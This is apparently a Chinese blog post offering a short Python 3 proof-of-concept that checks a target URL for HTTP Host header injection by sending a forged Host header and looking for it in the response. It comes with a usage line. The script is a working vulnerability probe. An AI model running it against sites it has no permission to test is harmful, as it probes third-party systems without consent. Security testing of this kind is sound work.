发布时间:2019-09-26 07:25:30编辑:auto阅读(2526)
简单版http host头***漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下:
from urllib import request
import sys
import re
url=sys.argv[1]
header={'Host' : 'www.eth10.com'}
req=request.Request(url,headers=header)
u = request.urlopen(req)
resp = u.read()
if re.match('.*www.eth10.com',str(resp)):
print('漏洞存在')
else:
print('不存在该漏洞')
使用语法:python3 host.py URL,URL格式为:http://xx.xx.xx
上一篇: Python3 安装 numpy 科学库
下一篇: python3基础学习(base64编码
51575
51158
41667
38426
32914
29888
28604
23566
23499
21849
2001°
2714°
2269°
2190°
2652°
2208°
2963°
4898°
4736°
3375°